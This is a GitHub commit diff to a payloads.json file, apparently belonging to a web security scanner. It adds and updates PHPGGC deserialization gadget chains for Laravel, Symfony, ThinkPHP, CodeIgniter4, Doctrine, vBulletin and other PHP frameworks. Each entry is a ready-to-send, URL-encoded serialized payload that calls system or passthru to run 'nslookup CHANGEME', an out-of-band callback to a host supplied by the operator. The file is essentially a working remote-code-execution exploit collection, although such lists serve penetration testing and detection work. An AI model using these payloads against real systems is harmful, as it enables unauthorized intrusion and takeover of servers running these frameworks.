Skip to content

Commit

Permalink
Update payloads.json
Browse files Browse the repository at this point in the history 
# Add/Update:

Doctrine RCE1
CodeIgniter4 RCE1
Laravel RCE13
Laravel RCE14
Laravel RCE15
Laravel RCE16
Symfony RCE7
ThinkPHP RCE3
ThinkPHP RCE4
vBulletin RCE1
  • Loading branch information
@ricardojba
ricardojba authored Feb 23, 2023
1 parent 7271dc9 commit 112398b
Showing 1 changed file with 53 additions and 5 deletions.
58 changes: 53 additions & 5 deletions res/payloads.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,7 @@
"_needs_dynamic_payload_editing": false,
"name": "CodeIgniter 4.0.0-beta.1 <= ? (1)",
"gen_with": "./phpggc CodeIgniter4/RCE1 <function> <parameter>",
"payload": "O:39:\"CodeIgniter\\Cache\\Handlers\\RedisHandler\":1:{s:8:\"%00*%00redis\"%3BO:45:\"CodeIgniter\\Session\\Handlers\\MemcachedHandler\":2:{s:12:\"%00*%00memcached\"%3BO:17:\"CodeIgniter\\Model\":5:{s:10:\"%00*%00builder\"%3BO:32:\"CodeIgniter\\Database\\BaseBuilder\":0:{}s:13:\"%00*%00primaryKey\"%3BN%3Bs:15:\"%00*%00beforeDelete\"%3Ba:1:{i:0%3Bs:8:\"validate\"%3B}s:18:\"%00*%00validationRules\"%3Ba:1:{s:2:\"id\"%3Ba:1:{s:5:\"rules\"%3Ba:1:{i:0%3Bs:6:\"system\"%3B}}}s:13:\"%00*%00validation\"%3BO:33:\"CodeIgniter\\Validation\\Validation\":1:{s:15:\"%00*%00ruleSetFiles\"%3Ba:1:{i:0%3Bs:5:\"finfo\"%3B}}}s:10:\"%00*%00lockKey\"%3Bs:63:\"nslookup CHANGEME\"%3B}}"
"payload": "O:39:\"CodeIgniter\\Cache\\Handlers\\RedisHandler\":1:{s:8:\"%00*%00redis\"%3BO:45:\"CodeIgniter\\Session\\Handlers\\MemcachedHandler\":2:{s:12:\"%00*%00memcached\"%3BO:17:\"CodeIgniter\\Model\":5:{s:10:\"%00*%00builder\"%3BO:32:\"CodeIgniter\\Database\\BaseBuilder\":0:{}s:13:\"%00*%00primaryKey\"%3BN%3Bs:15:\"%00*%00beforeDelete\"%3Ba:1:{i:0%3Bs:8:\"validate\"%3B}s:18:\"%00*%00validationRules\"%3Ba:1:{s:2:\"id\"%3Ba:1:{s:5:\"rules\"%3Ba:1:{i:0%3Bs:8:\"passthru\"%3B}}}s:13:\"%00*%00validation\"%3BO:33:\"CodeIgniter\\Validation\\Validation\":1:{s:15:\"%00*%00ruleSetFiles\"%3Ba:1:{i:0%3Bs:5:\"finfo\"%3B}}}s:10:\"%00*%00lockKey\"%3Bs:63:\"nslookup CHANGEME\"%3B}}"
},
{
"_needs_dynamic_payload_editing": false,
Expand Down Expand Up @@ -69,7 +69,7 @@
"_needs_dynamic_payload_editing": false,
"name": "Doctrine/RCE1 1.5.1 <= 2.7.2",
"gen_with": "./phpggc Doctrine/RCE1 <code>",
"payload": "8.1.12a:4:{i:1000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:99999999999999999%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:71:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MockFileSessionStorage\":5:{s:7:\"started\"%3Bb:1%3Bs:8:\"savePath\"%3Bs:4:\"/tmp\"%3Bs:2:\"id\"%3Bs:3:\"aaa\"%3Bs:4:\"data\"%3Ba:1:{i:0%3Bs:85:\"<?php passthru('nslookup CHANGEME')%3B ?>\"%3B}s:11:\"metadataBag\"%3BO:60:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MetadataBag\":1:{s:10:\"storageKey\"%3Bs:1:\"a\"%3B}}}i:1000%3Bi:1%3Bi:2000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:0%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:44:\"Symfony\\Component\\Cache\\Adapter\\ProxyAdapter\":1:{s:4:\"pool\"%3BO:47:\"Symfony\\Component\\Cache\\Adapter\\PhpArrayAdapter\":1:{s:4:\"file\"%3Bs:17:\"/tmp/aaa.mocksess\"%3B}}}i:2000%3Bi:1%3B}"
"payload": "a:4:{i:1000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:99999999999999999%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:71:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MockFileSessionStorage\":5:{s:7:\"started\"%3Bb:1%3Bs:8:\"savePath\"%3Bs:4:\"/tmp\"%3Bs:2:\"id\"%3Bs:3:\"aaa\"%3Bs:4:\"data\"%3Ba:1:{i:0%3Bs:85:\"<?php passthru('nslookup CHANGEME')%3B ?>\"%3B}s:11:\"metadataBag\"%3BO:60:\"Symfony\\Component\\HttpFoundation\\Session\\Storage\\MetadataBag\":1:{s:10:\"storageKey\"%3Bs:1:\"a\"%3B}}}i:1000%3Bi:1%3Bi:2000%3BO:39:\"Doctrine\\Common\\Cache\\Psr6\\CacheAdapter\":3:{s:13:\"deferredItems\"%3Ba:1:{i:0%3BO:41:\"Doctrine\\Common\\Cache\\Psr6\\TypedCacheItem\":2:{s:6:\"expiry\"%3Bi:0%3Bs:5:\"value\"%3Bs:4:\"test\"%3B}}s:6:\"loader\"%3Bi:1%3Bs:5:\"cache\"%3BO:47:\"Symfony\\Component\\Cache\\Adapter\\PhpArrayAdapter\":1:{s:4:\"file\"%3Bs:17:\"/tmp/aaa.mocksess\"%3B}}i:2000%3Bi:1%3B}"
},
{
"_needs_dynamic_payload_editing": false,
Expand Down Expand Up @@ -161,6 +161,30 @@
"gen_with": "./phpggc Laravel/RCE12 <function> <parameter>",
"payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:60:\"Illuminate\\Foundation\\Support\\Providers\\RouteServiceProvider\":1:{s:6:\"%00*%00app\"%3BO:23:\"Illuminate\\View\\Factory\":1:{s:9:\"%00*%00finder\"%3BO:37:\"Symfony\\Component\\Console\\Application\":3:{s:50:\"%00Symfony\\Component\\Console\\Application%00initialized\"%3Bb:1%3Bs:47:\"%00Symfony\\Component\\Console\\Application%00commands\"%3Ba:1:{i:0%3BO:33:\"Illuminate\\Foundation\\AliasLoader\":1:{s:10:\"%00*%00aliases\"%3Ba:1:{i:0%3Bs:3:\"key\"%3B}}}s:52:\"%00Symfony\\Component\\Console\\Application%00commandLoader\"%3BO:27:\"Illuminate\\Cache\\Repository\":1:{s:8:\"%00*%00store\"%3BO:20:\"PhpOption\\LazyOption\":3:{s:28:\"%00PhpOption\\LazyOption%00option\"%3BN%3Bs:30:\"%00PhpOption\\LazyOption%00callback\"%3Bs:6:\"system\"%3Bs:31:\"%00PhpOption\\LazyOption%00arguments\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}}}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Laravel ??? (13)",
"gen_with": "./phpggc Laravel/RCE13 <function> <parameter>",
"payload": "O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"%00*%00events\"%3BO:35:\"Illuminate\\Database\\DatabaseManager\":2:{s:6:\"%00*%00app\"%3Ba:1:{s:6:\"config\"%3Ba:2:{s:16:\"database.default\"%3Bs:8:\"passthru\"%3Bs:20:\"database.connections\"%3Ba:1:{s:8:\"passthru\"%3Ba:1:{i:0%3Bs:63:\"nslookup CHANGEME\"%3B}}}}s:13:\"%00*%00extensions\"%3Ba:1:{s:8:\"passthru\"%3Bs:12:\"array_filter\"%3B}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Laravel ??? (14)",
"gen_with": "./phpggc Laravel/RCE14 <function> <parameter>",
"payload": "O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"%00*%00events\"%3BO:20:\"Faker\\ValidGenerator\":3:{s:12:\"%00*%00generator\"%3BO:22:\"Faker\\DefaultGenerator\":1:{s:10:\"%00*%00default\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:13:\"%00*%00maxRetries\"%3Bi:1%3Bs:12:\"%00*%00validator\"%3Bs:8:\"passthru\"%3B}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Laravel ??? (15)",
"gen_with": "./phpggc Laravel/RCE15 <function> <parameter>",
"payload": "O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"%00*%00events\"%3BO:29:\"Illuminate\\Queue\\QueueManager\":2:{s:6:\"%00*%00app\"%3Ba:1:{s:6:\"config\"%3Ba:2:{s:13:\"queue.default\"%3Bs:3:\"key\"%3Bs:21:\"queue.connections.key\"%3Ba:1:{s:6:\"driver\"%3Bs:4:\"func\"%3B}}}s:13:\"%00*%00connectors\"%3Ba:1:{s:4:\"func\"%3Ba:2:{i:0%3BO:28:\"Illuminate\\Auth\\RequestGuard\":3:{s:11:\"%00*%00callback\"%3Bs:14:\"call_user_func\"%3Bs:10:\"%00*%00request\"%3Bs:8:\"passthru\"%3Bs:11:\"%00*%00provider\"%3Bs:63:\"nslookup CHANGEME\"%3B}i:1%3Bs:4:\"user\"%3B}}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Laravel ??? (16)",
"gen_with": "./phpggc Laravel/RCE17 <function> <parameter>",
"payload": "O:35:\"Monolog\\Handler\\RotatingFileHandler\":4:{s:13:\"%00*%00mustRotate\"%3Bb:1%3Bs:11:\"%00*%00filename\"%3Bs:8:\"anything\"%3Bs:17:\"%00*%00filenameFormat\"%3BO:38:\"Illuminate\\Validation\\Rules\\RequiredIf\":1:{s:9:\"condition\"%3Ba:2:{i:0%3BO:28:\"Illuminate\\Auth\\RequestGuard\":3:{s:11:\"%00*%00callback\"%3Bs:14:\"call_user_func\"%3Bs:10:\"%00*%00request\"%3Bs:8:\"passthru\"%3Bs:11:\"%00*%00provider\"%3Bs:63:\"nslookup CHANGEME\"%3B}i:1%3Bs:4:\"user\"%3B}}s:13:\"%00*%00dateFormat\"%3Bs:1:\"l\"%3B}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "Spiral 2.7.0 <= 2.8.13 (1)",
Expand Down Expand Up @@ -289,16 +313,34 @@
},
{
"_needs_dynamic_payload_editing": false,
"name": "ThinkPHP 5.1.x-5.2.x",
"name": "Symfony ??? (7)",
"gen_with": "./phpggc Symfony/RCE7 <function> <parameter>",
"payload": "O:47:\"Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter\":2:{s:57:\"%00Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter%00deferred\"%3Bs:63:\"nslookup CHANGEME\"%3Bs:61:\"%00Symfony\\Component\\Cache\\Adapter\\TagAwareAdapter%00getTagsByKey\"%3Bs:8:\"passthru\"%3B}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "ThinkPHP 5.1.x-5.2.x (1)",
"gen_with": "./phpggc ThinkPHP/RCE1 <function> <parameter>",
"payload": "O:27:\"think\\process\\pipes\\Windows\":1:{s:34:\"%00think\\process\\pipes\\Windows%00files\"%3Ba:1:{i:0%3BO:17:\"think\\model\\Pivot\":3:{s:17:\"%00think\\Model%00data\"%3Ba:1:{s:5:\"smi1e\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:21:\"%00think\\Model%00withAttr\"%3Ba:1:{s:5:\"smi1e\"%3Bs:6:\"system\"%3B}s:9:\"%00*%00append\"%3Ba:1:{s:5:\"smi1e\"%3Bs:1:\"1\"%3B}}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "ThinkPHP 5.0.24",
"gen_with": "./phpggc ThinkPHP/RCE1 <function> <parameter>",
"name": "ThinkPHP 5.0.24 (2)",
"gen_with": "./phpggc ThinkPHP/RCE2 <function> <parameter>",
"payload": "O:27:\"think\\process\\pipes\\Windows\":1:{s:34:\"%00think\\process\\pipes\\Windows%00files\"%3Ba:1:{i:0%3BO:17:\"think\\model\\Pivot\":5:{s:9:\"%00*%00append\"%3Ba:1:{i:0%3Bs:8:\"getError\"%3B}s:8:\"%00*%00error\"%3BO:27:\"think\\model\\relation\\HasOne\":3:{s:15:\"%00*%00selfRelation\"%3Bb:0%3Bs:8:\"%00*%00query\"%3BO:14:\"think\\db\\Query\":1:{s:8:\"%00*%00model\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENS<getAttr>no<\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}}s:11:\"%00*%00bindAttr\"%3Ba:2:{i:0%3Bs:2:\"no\"%3Bi:1%3Bs:3:\"123\"%3B}}s:9:\"%00*%00parent\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENS<getAttr>no<\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}s:15:\"%00*%00selfRelation\"%3Bb:0%3Bs:8:\"%00*%00query\"%3BO:14:\"think\\db\\Query\":1:{s:8:\"%00*%00model\"%3BO:20:\"think\\console\\Output\":2:{s:28:\"%00think\\console\\Output%00handle\"%3BO:30:\"think\\session\\driver\\Memcached\":2:{s:10:\"%00*%00handler\"%3BO:27:\"think\\cache\\driver\\Memcache\":3:{s:10:\"%00*%00options\"%3Ba:5:{s:6:\"expire\"%3Bi:0%3Bs:12:\"cache_subdir\"%3Bb:0%3Bs:6:\"prefix\"%3Bs:0:\"\"%3Bs:4:\"path\"%3Bs:0:\"\"%3Bs:13:\"data_compress\"%3Bb:0%3B}s:10:\"%00*%00handler\"%3BO:13:\"think\\Request\":2:{s:6:\"%00*%00get\"%3Ba:1:{s:18:\"HEXENS<getAttr>no<\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:9:\"%00*%00filter\"%3Bs:6:\"system\"%3B}s:6:\"%00*%00tag\"%3Bb:1%3B}s:9:\"%00*%00config\"%3Ba:7:{s:4:\"host\"%3Bs:9:\"127.0.0.1\"%3Bs:4:\"port\"%3Bi:11211%3Bs:6:\"expire\"%3Bi:3600%3Bs:7:\"timeout\"%3Bi:0%3Bs:12:\"session_name\"%3Bs:6:\"HEXENS\"%3Bs:8:\"username\"%3Bs:0:\"\"%3Bs:8:\"password\"%3Bs:0:\"\"%3B}}s:9:\"%00*%00styles\"%3Ba:1:{i:0%3Bs:7:\"getAttr\"%3B}}}}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "ThinkPHP ??? (3)",
"gen_with": "./phpggc ThinkPHP/RCE3 <function> <parameter>",
"payload": "O:41:\"League\\Flysystem\\Cached\\Storage\\Psr6Cache\":3:{s:47:\"%00League\\Flysystem\\Cached\\Storage\\Psr6Cache%00pool\"%3BO:26:\"League\\Flysystem\\Directory\":2:{s:13:\"%00*%00filesystem\"%3BO:26:\"League\\Flysystem\\Directory\":2:{s:13:\"%00*%00filesystem\"%3BO:14:\"think\\Validate\":1:{s:7:\"%00*%00type\"%3Ba:1:{s:3:\"key\"%3Bs:8:\"passthru\"%3B}}s:7:\"%00*%00path\"%3Bs:63:\"nslookup CHANGEME\"%3B}s:7:\"%00*%00path\"%3Bs:3:\"key\"%3B}s:11:\"%00*%00autosave\"%3Bb:0%3Bs:6:\"%00*%00key\"%3Ba:1:{i:0%3Bs:8:\"anything\"%3B}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "ThinkPHP ??? (4)",
"gen_with": "./phpggc ThinkPHP/RCE4 <function> <parameter>",
"payload": "O:17:\"think\\model\\Pivot\":9:{s:19:\"%00think\\Model%00exists\"%3Bb:1%3Bs:18:\"%00think\\Model%00force\"%3Bb:1%3Bs:21:\"%00think\\Model%00lazySave\"%3Bb:1%3Bs:9:\"%00*%00suffix\"%3BO:17:\"think\\model\\Pivot\":9:{s:19:\"%00think\\Model%00exists\"%3BN%3Bs:18:\"%00think\\Model%00force\"%3BN%3Bs:21:\"%00think\\Model%00lazySave\"%3BN%3Bs:9:\"%00*%00suffix\"%3BN%3Bs:17:\"%00think\\Model%00data\"%3Ba:1:{s:3:\"key\"%3Ba:1:{s:3:\"key\"%3Bs:63:\"nslookup CHANGEME\"%3B}}s:21:\"%00think\\Model%00withAttr\"%3Ba:1:{s:3:\"key\"%3Ba:1:{s:3:\"key\"%3Bs:8:\"passthru\"%3B}}s:7:\"%00*%00json\"%3Ba:1:{i:0%3Bs:3:\"key\"%3B}s:12:\"%00*%00jsonAssoc\"%3Bb:1%3Bs:12:\"%00*%00withEvent\"%3BN%3B}s:17:\"%00think\\Model%00data\"%3Ba:1:{s:3:\"key\"%3Ba:1:{s:3:\"key\"%3Bs:63:\"nslookup CHANGEME\"%3B}}s:21:\"%00think\\Model%00withAttr\"%3BN%3Bs:7:\"%00*%00json\"%3BN%3Bs:12:\"%00*%00jsonAssoc\"%3BN%3Bs:12:\"%00*%00withEvent\"%3Bb:0%3B}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "WordPress/Dompdf/RCE1 <= 0.8.5+ (1)",
Expand Down Expand Up @@ -449,5 +491,11 @@
"name": "PHPSecLib 2.0.0 <= 2.0.34 (1)",
"gen_with": "./phpggc PHPSecLib/RCE1 <php-code>",
"payload": "a:1:{i:0%3BO:18:\"phpseclib\\Net\\SSH1\":2:{s:6:\"bitmap\"%3Bi:1%3Bs:6:\"crypto\"%3BO:19:\"phpseclib\\Crypt\\AES\":8:{s:6:\"bitmap\"%3Bi:1%3Bs:6:\"crypto\"%3Bi:1%3Bs:10:\"block_size\"%3BN%3Bs:12:\"inline_crypt\"%3Ba:2:{i:0%3BO:25:\"phpseclib\\Crypt\\TripleDES\":6:{s:10:\"block_size\"%3Bs:113:\"1){}}}%3B ob_clean()%3Bpassthru('nslookup CHANGEME')%3Bdie()%3B ?>\"%3Bs:12:\"inline_crypt\"%3BN%3Bs:16:\"use_inline_crypt\"%3Bi:1%3Bs:7:\"changed\"%3Bi:0%3Bs:6:\"engine\"%3Bi:1%3Bs:4:\"mode\"%3Bi:1%3B}i:1%3Bs:26:\"_createInlineCryptFunction\"%3B}s:16:\"use_inline_crypt\"%3Bi:1%3Bs:7:\"changed\"%3Bi:0%3Bs:6:\"engine\"%3Bi:1%3Bs:4:\"mode\"%3Bi:1%3B}}}"
},
{
"_needs_dynamic_payload_editing": false,
"name": "vBulletin ??? (1)",
"gen_with": "./phpggc vBulletin/RCE1 <function> <parameter>",
"payload": "a:2:{i:0%3BO:27:\"googlelogin_vendor_autoload\":0:{}i:1%3BO:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"%00*%00socket\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3Br:4%3Bs:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:63:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:8:\"passthru\"%3B}}}}"
}
]

0 comments on commit 112398b

Please sign in to comment.